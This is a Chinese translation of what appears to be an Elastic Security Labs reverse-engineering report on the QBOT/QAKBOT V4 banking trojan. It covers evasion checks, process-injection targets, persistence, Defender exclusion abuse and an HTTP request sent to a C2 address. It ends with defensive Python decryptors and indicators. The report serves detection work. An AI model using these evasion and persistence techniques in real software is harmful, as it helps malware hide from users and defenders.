QBOT 恶意软件分析

要点

• Elastic 安全实验室发布了一份关于最近一次活动中 QBOT 恶意软件的分析报告
• 本报告涵盖了从初始感染到与其命令和控制服务器通信的执行链，其中包含有关其注入机制和动态持久性机制等深入功能的详细信息。
• 根据这项研究，我们制作了YARA 规则、配置提取器和入侵指标 (IOC)

序言

作为我们构建有关针对机构和个人的最常见恶意软件家族知识的任务的一部分，Elastic 恶意软件和逆向工程团队 (MARE) 完成了对先前报告的活动中银行木马 QBOT/QAKBOT V4 核心组件的分析。

QBOT（也称为 QAKBOT）是一种自 2007 年以来一直活跃的模块化木马，用于在目标机器上下载和运行二进制文件。本文档详细描述了 QBOT V4 核心组件的逆向工程。它涵盖了二进制文件从启动到与其命令和控制 (C2) 服务器通信的执行流程。

QBOT 是一个多阶段、多进程二进制文件，具有逃避检测、提升权限、配置持久性和通过一组 IP 地址与 C2 通信的功能。C2 可以更新 QBOT、上传新的 IP 地址、上传和运行无文件二进制文件以及执行 shell 命令。

作为此分析的结果，MARE 基于 QBOT 的核心组件创建了新的 yara 规则，以及能够提取和解密其字符串、配置及其 C2 IP 地址列表的静态配置提取器。

有关 QBOT 配置提取器和恶意软件分析的信息，请查看我们详细介绍此内容的博客文章

• QBOT 配置提取器
• QBOT 攻击模式

执行流程

本节介绍 QBOT 的执行流程，分为以下三个阶段

• 第一阶段：初始化
• 第二阶段：安装
• 第三阶段：通信

第一阶段

该示例使用 regsvr32.exe 二进制文件执行，后者将调用 QBOT 的 DllRegisterServer 导出

执行后，QBOT 会检查是否在 Windows Defender 沙箱下运行，方法是检查是否存在名为 C:\INTERNAL\__empty 的特定子目录，如果此文件夹存在，则恶意软件会自行终止

然后，恶意软件将枚举正在运行的进程，以检测计算机上的任何防病毒 (AV) 产品。下图包含 QBOT 会做出反应的 AV 供应商列表

检测 AV 不会阻止 QBOT 运行。但是，它会在以后的阶段改变其行为。为了为其伪随机数生成器 (PRNG) 生成种子，QBOT 使用以下表达式生成计算机的指纹

**fingerprint = CRC32(computerName + CVolumeSerialNumber + AccountName)**

如果 “C:” 卷不存在，则改为使用以下表达式

**fingerprint = CRC32(computerName + AccountName)**

最后，QBOT 将根据先前检测到的 AV 和机器架构选择一组要注入的目标

| | | | -------------------------- | ------------------------------------------------------------------------------------------------------------- | ---------------------- | ----------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------ | | 检测到的 AV 和架构 | 目标 | | BitDefender | Kaspersky | Sophos | TrendMicro | & x86 | %SystemRoot%\SysWOW64\mobsync.exe %SystemRoot%\SysWOW64\explorer.exe | | BitDefender | Kaspersky | Sophos | TrendMicro & x64 | %SystemRoot%\System32\mobsync.exe%SystemRoot%\explorer.exe%ProgramFiles%\Internet Explorer\iexplore.exe | | Avast | AVG | Windows Defender & x86 | %SystemRoot%\SysWOW64\OneDriveSetup.exe%SystemRoot%\SysWOW64\msra.exe%ProgramFiles(x86)%\Internet Explorer\iexplore.exe | | Avast | AVG | Windows Defender & x64 | %SystemRoot%\System32\OneDriveSetup.exe%SystemRoot%\System32\msra.exe | | x86 | '%SystemRoot%\explorer.exe%SystemRoot%\System32\msra.exe%SystemRoot%\System32\OneDriveSetup.exe | | x64 | %SystemRoot%\SysWOW64\explorer.exe%SystemRoot%\SysWOW64\msra.exe%SystemRoot%\System32\OneDriveSetup.exe |

QBOT 将尝试迭代注入自身，使用其第二阶段作为入口点，注入到其目标之一，如果注入失败，则选择下一个目标进程。下面是一个 QBOT 注入到 explorer.exe 的示例。

第二阶段

QBOT 通过将二进制文件的内容保存在内存中，然后破坏磁盘上的文件来开始其第二阶段

然后，恶意软件会从其资源部分之一加载其配置

如果进程根目录中存在 .cfg 文件，QBOT 也能够从中加载其配置

加载配置后，QBOT 会继续在计算机上安装自身，首先将其内部配置写入注册表

不久之后，QBOT 会在 %APPDATA%\Microsoft 目录下创建一个具有随机生成名称的持久性子目录。此文件夹用于放置内存中的 QBOT 二进制文件，以便在重新启动后保持持久性

此时，文件夹将为空，因为恶意软件仅在检测到关闭/重新启动事件时才会放置二进制文件。此“应急”二进制文件将在重新启动后删除。

QBOT 将尝试对所有用户执行相同的安装过程，并尝试在用户会话中执行恶意软件（如果存在），或者在 CurrentVersion\Run 注册表项下为目标用户创建一个值，以便在下次登录时启动恶意软件。我们的分析未能在一台更新的 Windows 10 机器上重现此行为。唯一观察到的工件是在用户 %APPDATA%\Microsoft 目录下创建的随机生成的持久性文件夹

QBOT 通过恢复其损坏的二进制文件的内容并通过 Schtask 注册一个任务，以便在 NT AUTHORITY\SYSTEM 帐户下启动 QBOT 服务来完成其第二阶段。

如果进程在 SYSTEM 帐户下运行，则第一阶段具有特殊的执行路径，它会注册一个服务处理程序。然后，QBOT 服务会像往常一样执行第 2 阶段和第 3 阶段，再次损坏二进制文件并通过通过随机生成的命名管道接收的消息代表其他 QBOT 进程执行命令

第三阶段

QBOT 通过注册窗口和控制台事件处理程序来监视挂起/恢复和关闭/重新启动事件来开始其第三阶段。监视这些事件使恶意软件能够通过在持久性文件夹中放置 QBOT 二进制文件的副本并在 CurrentVersion\Run 注册表项下创建一个值来动态安装持久性

重新启动时，QBOT 将负责删除任何持久性工件。

恶意软件将继续创建一个监视线程，每秒钟对照硬编码的二进制文件列表监视正在运行的进程。如果任何进程匹配，则会设置一个注册表值，该值会将 QBOT 的行为更改为使用随机生成的 IP 地址而不是实际的 IP 地址，从而永远不会到达其命令和控制服务器

然后，QBOT 将从其 .rsrc 文件之一和注册表中加载其域，因为从其 C2 收到的每个域更新都将成为写入注册表的配置的一部分。请参阅附录 A 中的提取的网络基础设施。

最后，恶意软件开始通过 HTTP 和 TLS 与 C2 通信。底层协议使用封装在加密消息中的 JSON 对象，然后进行 base64 编码

下面是 QBOT 发送到其 C2 的 HTTP POST 请求的示例

Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 181.118.183.98
Content-Length: 77
Cache-Control: no-cache

qxlbjrbj=NnySaFAKLt+YgjH3UET8U6AUwT9Lg51z6zC+ufeAjt4amZAXkIyDup74MImUA4do4Q==

通过此通信通道，QBOT 接收来自 C2 的命令 - 请参阅附录 B（命令处理程序）。除了管理命令（更新、配置旋钮）之外，我们的样本仅处理与二进制执行相关的命令，但我们知道该恶意软件是模块化的，可以使用其他功能构建，例如 VNC 服务器、反向 shell 服务器、代理支持（成为域列表的一部分）以及许多其他可行功能。

功能

梅森旋转随机数生成器

QBOT 使用 梅森旋转随机数生成器 (MTRNG) 的实现来生成随机值。

MTRNG 引擎随后被各种函数使用来生成不同类型的数据，例如用于生成注册表键值和持久性文件夹。由于 QBOT 需要重现这些值，它几乎总是会使用计算机指纹和一个特定于它想要生成的值的“盐”。

字符串混淆

所有 QBOT 字符串都经过 XOR 加密，并连接成一个我们称之为“字符串库”的单个 blob。为了获取特定字符串，恶意软件需要一个字符串标识符（标识符是字符串库中的偏移量）、一个解密密钥和目标字符串库。

由于此样本有两个字符串库，因此它有四个 GetString 函数，这些函数柯里化了字符串库和解密密钥参数：每个字符串库一个 C 字符串函数和一个宽字符串函数。宽字符串函数使用相同的字符串库，但将数据转换为 utf-16。

请参阅附录 C（字符串解密实现）。

导入混淆

QBOT 使用哈希表解析其导入。

恶意软件通过其 GetString 函数解析库名称，然后通过手动解析经典库的导出项来解析哈希表，并将每个导出项与预期的哈希值进行比较。在此示例中，哈希比较算法使用此公式：

**CRC32(exportName) XOR 0x218fe95b == hash**

资源混淆

恶意软件嵌入了不同的资源，常见的资源是配置和域列表。资源以相同的方式加密：解密密钥可以嵌入在数据 blob 中，也可以提供。资源解密后，将使用嵌入的哈希值来检查数据有效性。

请参阅附录 D（资源解密实现）。

西里尔语键盘语言检测

在不同的阶段，QBOT 会检查计算机是否使用西里尔语键盘。如果使用，它将阻止进一步执行。

AVG/AVAST 特殊行为

AVG 和 Avast 共享相同的防病毒引擎。因此，如果 QBOT 检测到其中一个防病毒软件正在运行，它还会在安装阶段检查是否在恶意软件内存空间中加载了它们的 DLL 之一。如果是，QBOT 将跳过安装阶段。

Windows Defender 特殊行为

如果 QBOT 在 SYSTEM 帐户下运行，它会将其持久性文件夹添加到注册表中的 Windows Defender 排除路径。如果检测到旧版 Microsoft Security Essential (MSE) 排除路径，它也会执行此操作。

异常列表进程看门狗

每秒，QBOT 都会解析正在运行的进程，查找与硬编码异常列表匹配的进程。如果找到任何匹配项，则会在注册表中设置一个“熔断”值，并且看门狗停止。如果设置了此熔断值，QBOT 不会停止执行，但在第三阶段，恶意软件将使用随机生成的 IP，并且无法联系 C2。

![如果设置了熔断值，QBOT 使用随机生成的 IP 地址]/assets/images/qbot-malware-analysis/1qbot.png)

QBOT 进程注入

第二阶段注入

为了将其第二阶段注入到硬编码目标之一，QBOT 使用经典的 CreateProcess、WriteProcessMemory、ResumeProcess DLL 注入技术。恶意软件将创建一个进程，在进程内存中分配和写入 QBOT 二进制文件，写入其引擎的副本，并修补入口点以跳转到特殊函数。此函数在新进程环境中执行 QBOT 及其引擎的轻初始化，向主进程发出其成功的警报，然后执行第二阶段。

![QBOT 第二阶段注入]/assets/images/qbot-malware-analysis/2qbot.png)

![QBOT 注入入口点]/assets/images/qbot-malware-analysis/3qbot.jpg)

从命令和控制注入库

QBOT 使用上述方法注入从 C2 接收的库。不同之处在于，除了映射自身之外，恶意软件还将映射接收到的二进制文件，并使用库加载器作为入口点。

![QBOT DLL 加载器注入]/assets/images/qbot-malware-analysis/4qbot.jpg)

多用户安装

QBOT 安装过程的一部分是在其他用户的帐户中安装自身。为此，恶意软件会枚举机器上每个具有帐户的用户（本地和域），然后在用户的 Software\Microsoft 注册表项下转储其配置，在用户的 %APPDATA%\Microsoft 文件夹下创建持久性文件夹，最后尝试在用户会话存在的情况下启动 QBOT，否则创建运行键以便在用户登录时启动恶意软件。

动态持久性

QBOT 注册一个窗口处理程序来监视挂起/恢复事件。当这些事件发生时，恶意软件将安装/卸载持久性。

![QBOT 窗口处理程序注册]/assets/images/qbot-malware-analysis/7qbot.png)

![QBOT 窗口处理程序捕获挂起/恢复事件]/assets/images/qbot-malware-analysis/8qbot.png)

QBOT 还注册一个控制台事件来处理关机/重启事件。

命令和控制公钥绑定

QBOT 有一种机制来验证从其命令和控制收到的每条消息的签名。验证机制基于样本中嵌入的公钥。此公钥可用于识别样本所属的活动，但此机制可能并非总是存在。

![QBOT 命令和控制消息处理]/assets/images/qbot-malware-analysis/1qbot.png)

![使用硬编码的命令和控制公钥进行消息签名验证]/assets/images/qbot-malware-analysis/2qbot.png)

公钥来自硬编码的 XOR 加密数据 blob。

![正在进行 XOR 解密的硬编码命令和控制公钥]/assets/images/qbot-malware-analysis/3qbot.jpg)

计算机信息收集

QBOT 与其命令和控制通信的一部分是发送有关计算机的信息。通过一组 Windows API 调用、shell 命令和 Windows Management Instrumentation (WMI) 命令来收集信息。

![计算机信息收集 1/2]/assets/images/qbot-malware-analysis/4qbot.jpg)

一个特别有趣的程序通过 WMI 列出已安装的防病毒软件。

更新机制

QBOT 可以从其命令和控制接收更新。新的二进制文件将写入磁盘，通过命令行执行，主进程将终止。

![QBOT 写入磁盘并运行更新后的二进制文件]/assets/images/qbot-malware-analysis/7qbot.png)

![如果正在运行更新，QBOT 停止执行]/assets/images/qbot-malware-analysis/8qbot.png)

进程注入管理器

QBOT 有一个系统来跟踪注入了从其命令和控制接收的二进制文件的进程，以便在恶意软件接收后续命令时管理它们。它还可以在必须停止执行并在重新启动时恢复执行的情况下，将这些二进制文件序列化并保存到磁盘上。

为了进行此簿记，QBOT 维护两个全局结构 — 从其命令和控制接收的所有二进制文件的列表，以及正在运行的注入进程的列表。

结论

由于其功能和强大的模块化系统，QBOT 恶意软件家族非常活跃，并且仍然是 2022 年威胁形势的一部分。虽然最初在 2007 年被定性为信息窃取者，但该家族已被用作其他恶意软件和后渗透活动的传递机制。

Elastic Security 提供了针对此威胁的开箱即用型预防功能。现有的 Elastic Security 用户可以在产品中访问这些功能。如果您是 Elastic Security 的新手，请查看我们的快速入门指南（快速入门的简短培训视频）或我们的免费基础培训课程。您可以随时开始免费试用 Elastic Cloud 14 天。

MITRE ATT&CK 战术和技术

MITRE ATT&CK 是一个全球可访问的基于真实世界观察的对抗战术和技术知识库。ATT&CK 知识库被用作私营部门、政府以及网络安全产品和服务社区中开发特定威胁模型和方法的基础。

战术

战术代表技术或子技术的原因。它是对手的战术目标：执行行动的原因。

• 战术：特权升级
• 战术：防御规避
• 战术：发现
• 战术：命令和控制

技术 / 子技术

技术和子技术代表对手如何通过执行操作来实现战术目标。

• 技术：进程注入 (T1055)
• 技术：修改注册表 (T1112)
• 技术：混淆的文件或信息 (T1027)
• 技术：混淆的文件或信息：从工具中删除指示器 (T1027.005)
• 技术：系统二进制代理执行：Regsvr32 (T1218.010)
  技术：应用程序窗口发现 (T1010)
• 技术：文件和目录发现 (T1083)
• 技术：系统信息发现 (T1082)
• 技术：系统位置发现 (T1614)
• 技术：软件发现：安全软件发现 (T1518.001)
• 技术：系统所有者/用户发现 (T1033)
• 技术：应用层协议：Web 协议 (T1071.001)

观察

虽然不够具体，无法被视为入侵指标，但在分析过程中观察到以下信息，这些信息可以在调查可疑事件时提供帮助。

文件系统

持久性文件夹

**%APPDATA%\Microsoft\[Random Folder]**

示例

**C:\Users\Arx\AppData\Roaming\Microsoft\Vuhys**

注册表

扫描排除

**HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\[Persistence Folder]**

示例

**HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Arx\AppData\Roaming\Microsoft\Blqgeaf**

配置

配置

**HKU\[User SID]\Software\Microsoft\[Random Key]\[Random Value 0]**

示例

**HKU\S-1-5-21-2844492762-1358964462-3296191067-1000\Software\Microsoft\Silhmfua\28e2a7e8**

附录

附录 A（提取的网络基础设施）

附录 B（命令处理程序）

附录 C（字符串解密实现）

def decipher_strings(data: bytes, key: bytes) -> bytes:
   result = dict()
   current_index = 0
   current_string = list()
   for i in range(len(data)):
       current_string.append(data[i] ^ key[i % len(key)])
       if data[i] == key[i % len(key)]:
              result[current_index] = bytes(current_string)
              current_string = list()
              current_index = i + 1
   return result

附录 D（资源解密实现）

from Crypto.Cipher import ARC4
from Crypto.Hash import SHA1

def decipher_data(data: bytes, key: bytes) -> tuple[bytes, bytes]:
   data = ARC4.ARC4Cipher(SHA1.SHA1Hash(key).digest()).decrypt(data)
   return data[20:], data[:20]


def verify_hash(data: bytes, expected_hash: bytes) -> bool:
   return SHA1.SHA1Hash(data).digest() == expected_hash


def decipher_rsrc(rsrc: bytes, key: bytes) -> bytes:
   deciphered_rsrc, expected_hash = decipher_data(rsrc[20:], rsrc[:20])
   if not verify_hash(deciphered_rsrc, expected_hash):
       deciphered_rsrc, expected_hash = decipher_data(rsrc, key)
       if not verify_hash(deciphered_rsrc, expected_hash):
              raise RuntimeError('Failed to decipher rsrc: Mismatching hashes.')
   return deciphered_rsrc